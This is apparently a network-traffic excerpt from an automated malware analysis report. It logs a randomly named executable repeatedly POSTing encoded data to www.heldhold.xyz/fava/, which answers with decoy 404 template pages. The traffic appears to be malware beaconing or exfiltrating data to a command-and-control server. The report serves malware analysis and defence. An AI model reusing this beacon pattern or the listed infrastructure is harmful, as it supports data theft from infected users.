                                                      Data Raw: 70 50 5f 38 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 30 5a 50 59 48 74 39 58 66 65 4c 57 76 59 67 6e 62 51 70 47 34 43 52 46 53 73 39 76 56 39 51 56 46 6f 43 59 4c 41 78 41 6f 62 52 50 6e 6e 39 75 49 77 71 33 4a 77 37 66 44 42 32 4a 37 6b 4a 30 70 70 51 33 73 38 47 66 6a 51 50 6b 35 4f 64 4e 44 4f 4f 6a 57 4a 4b 6f 67 63 64 37 45 46 54 49 2f 74 51 64 5a 71 46 59 4b 77 36 78 7a 36 6e 47 50 4a 39 78 63 4f 32 66 76 51 71 58 74 2f 67 5a 76 67 78 71 43 53 73 45 44 44 2f 53 37 65 49 45 45 74 61 64 75 44 68 73 51 53 31 67 63 52 34 54 76 31 42 77 55 4c 67 42 37 6b 42 53 4f 66 4d 2f 5a 6c 4e 76 51 3d 3d
                                                      Data Ascii: pP_8=LAr5q9LyWuo5N0ZPYHt9XfeLWvYgnbQpG4CRFSs9vV9QVFoCYLAxAobRPnn9uIwq3Jw7fDB2J7kJ0ppQ3s8GfjQPk5OdNDOOjWJKogcd7EFTI/tQdZqFYKw6xz6nGPJ9xcO2fvQqXt/gZvgxqCSsEDD/S7eIEEtaduDhsQS1gcR4Tv1BwULgB7kBSOfM/ZlNvQ==
                                                      Sep 11, 2024 11:18:22.311043978 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:21 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 11, 2024 11:18:22.311181068 CEST1236INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                      Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
                                                      Sep 11, 2024 11:18:22.311203957 CEST1236INData Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                      Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
                                                      Sep 11, 2024 11:18:22.311219931 CEST1236INData Raw: 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 20 66 61 62 6c
                                                      Data Ascii: glish</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
                                                      Sep 11, 2024 11:18:22.311234951 CEST896INData Raw: 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62 6c 65 73 20 54 65 6d 70 6c 61 74 65 22 20 63
                                                      Data Ascii: ndex.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-con
                                                      Sep 11, 2024 11:18:22.311249018 CEST1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                      Sep 11, 2024 11:18:22.311264038 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
                                                      Sep 11, 2024 11:18:22.311279058 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68
                                                      Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
                                                      Sep 11, 2024 11:18:22.311294079 CEST1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                      Sep 11, 2024 11:18:22.311309099 CEST1236INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>
                                                      Sep 11, 2024 11:18:22.311325073 CEST1236INData Raw: 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d
                                                      Data Ascii: nu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a> <ul class="dropdown-menu">
                                                      Sep 11, 2024 11:18:22.311614990 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:21 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.46333067.223.117.189803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:23.663914919 CEST783OUTPOST /fava/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.heldhold.xyz
                                                      Origin: http://www.heldhold.xyz
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.heldhold.xyz/fava/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 4e 51 56 6e 77 43 5a 50 55 78 42 6f 62 52 58 58 6e 38 6a 6f 77 74 33 4a 38 4a 66 43 39 32 4a 37 77 4a 30 70 5a 51 33 66 45 46 66 7a 51 4e 2f 4a 50 62 4a 44 4f 4f 6a 57 4a 4b 6f 67 59 6e 37 45 64 54 49 50 39 51 50 4e 2b 43 65 36 77 31 77 7a 36 6e 4c 76 4a 35 78 63 50 6a 66 72 51 45 58 76 33 67 5a 71 45 78 71 7a 53 76 4e 44 44 44 4e 72 66 69 4b 6c 51 44 62 38 4c 68 76 53 43 79 70 76 4e 2b 53 70 6b 62 68 6c 71 33 54 37 41 79 50 4a 57 34 79 61 59 45 30 54 43 2f 64 4a 51 73 46 59 6d 75 62 38 49 62 38 69 34 33 37 70 38 3d
                                                      Data Ascii: pP_8=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjNQVnwCZPUxBobRXXn8jowt3J8JfC92J7wJ0pZQ3fEFfzQN/JPbJDOOjWJKogYn7EdTIP9QPN+Ce6w1wz6nLvJ5xcPjfrQEXv3gZqExqzSvNDDDNrfiKlQDb8LhvSCypvN+Spkbhlq3T7AyPJW4yaYE0TC/dJQsFYmub8Ib8i437p8=
                                                      Sep 11, 2024 11:18:24.239707947 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:24 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 11, 2024 11:18:24.239788055 CEST224INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                      Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/o
                                                      Sep 11, 2024 11:18:24.239837885 CEST1236INData Raw: 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f
                                                      Data Ascii: wl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css"> ... FABLES CUSTOM C
                                                      Sep 11, 2024 11:18:24.239885092 CEST1236INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62
                                                      Data Ascii: div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <div class="container">
                                                      Sep 11, 2024 11:18:24.239928007 CEST1236INData Raw: 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                      Data Ascii: > </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconphone"></sp
                                                      Sep 11, 2024 11:18:24.239962101 CEST672INData Raw: 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67
                                                      Data Ascii: vDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span> </button>
                                                      Sep 11, 2024 11:18:24.239984035 CEST1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                      Sep 11, 2024 11:18:24.240005016 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
                                                      Sep 11, 2024 11:18:24.240026951 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68
                                                      Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
                                                      Sep 11, 2024 11:18:24.240151882 CEST1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                      Sep 11, 2024 11:18:24.246325016 CEST1236INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.46333167.223.117.189803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:26.204415083 CEST10865OUTPOST /fava/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.heldhold.xyz
                                                      Origin: http://www.heldhold.xyz
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.heldhold.xyz/fava/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 46 51 56 55 34 43 59 75 55 78 48 59 62 52 4a 6e 6e 68 6a 6f 77 77 33 4a 30 4e 66 43 77 4c 4a 35 49 4a 30 49 35 51 2f 4f 45 46 55 7a 51 4e 67 35 50 4c 4e 44 4f 62 6a 57 5a 47 6f 67 49 6e 37 45 64 54 49 4e 31 51 4d 5a 71 43 46 36 77 36 78 7a 36 6a 47 50 4a 52 78 63 47 59 66 72 63 36 58 66 58 67 59 4b 30 78 35 78 71 76 43 44 44 42 4f 72 66 36 4b 6c 63 6d 62 38 57 61 76 54 47 55 70 6f 6c 2b 52 2b 55 4e 30 45 43 2f 47 72 63 56 62 5a 75 67 37 35 6c 45 79 51 53 57 5a 59 52 78 47 37 36 75 42 65 70 4b 67 44 6b 4f 69 2f 79 47 2b 4b 7a 2b 32 61 71 2f 72 43 74 4a 39 30 47 65 35 79 51 65 70 76 6e 79 63 39 79 71 51 61 49 76 72 35 37 4e 62 33 65 46 74 34 46 55 65 6b 68 35 4d 50 4d 6d 61 70 63 4d 64 30 6a 4b 42 58 77 4e 66 45 5a 6c 57 46 65 48 39 72 6b 6f 4b 30 41 38 57 6e 48 58 50 45 74 42 59 6a 56 4b 67 76 5a 61 32 47 54 67 57 70 78 4b 4d 70 31 64 48 4f 41 55 70 70 66 6b 76 [TRUNCATED]
                                                      Data Ascii: pP_8=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjFQVU4CYuUxHYbRJnnhjoww3J0NfCwLJ5IJ0I5Q/OEFUzQNg5PLNDObjWZGogIn7EdTIN1QMZqCF6w6xz6jGPJRxcGYfrc6XfXgYK0x5xqvCDDBOrf6Klcmb8WavTGUpol+R+UN0EC/GrcVbZug75lEyQSWZYRxG76uBepKgDkOi/yG+Kz+2aq/rCtJ90Ge5yQepvnyc9yqQaIvr57Nb3eFt4FUekh5MPMmapcMd0jKBXwNfEZlWFeH9rkoK0A8WnHXPEtBYjVKgvZa2GTgWpxKMp1dHOAUppfkvRo7eoKfLY8t8NLMhxg8dFCmt5JB9hxzAA/4u7/3YloBoLVxPw7IxKP/oOIhSckUrq3OSR059NS25EOLB5LmjR4JQqCXv2303LXeZGE7Pg1i0vHhCLWDWWYnjdPqdSwkZ1frY3E8pgyE+mKc4uRPx4VDocin0sSzwXEK8vz3o6wRiZAuaTcZlaIh++QYVoxuxhlQpw4jQyrWkfh7dLOkFN3DDdakEh8yGE9OYB/+xG1HJd4OEWhM1NlRrcwqg+xVSNEE7l0lp4oX+XqL2/tZqXALX/c7VvPP8l+08U1Q4MMDoOAgqQsoL9IsJFdELiUkDw4m1Mh9exI/pwLIqzfK+cudPcP3ciS33Nc859EogxNrx29EoK9XtDCODnLEHObWRyLbXLnHqWH4MBA0Cyyum/WLaPNR1SPvYQ/RFeIi4/69Y1kyzKWR7EKPyJj3iqwcCvPeI4kD5SxEBA2hjCpwcMH7PcNQoKO/aptffI7HxFkBEa3w6A7UfoM/u3bFHncBF6gklxE8NFOd1QKO1DrHvsFuXgU9kvdjRghGRyh4CZsLYG0mNZU0MXZ3ISGtZtiQ9TfxS0Ao2I21tGNVOYo3vzGiYs1EOU8/bXs+qNGY2usrxMb39BkuuyabWfmw7kDx1QIZv13g/68OjaFmfJwPgt7qCQkfXERIq4A [TRUNCATED]
                                                      Sep 11, 2024 11:18:26.797095060 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:26 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html
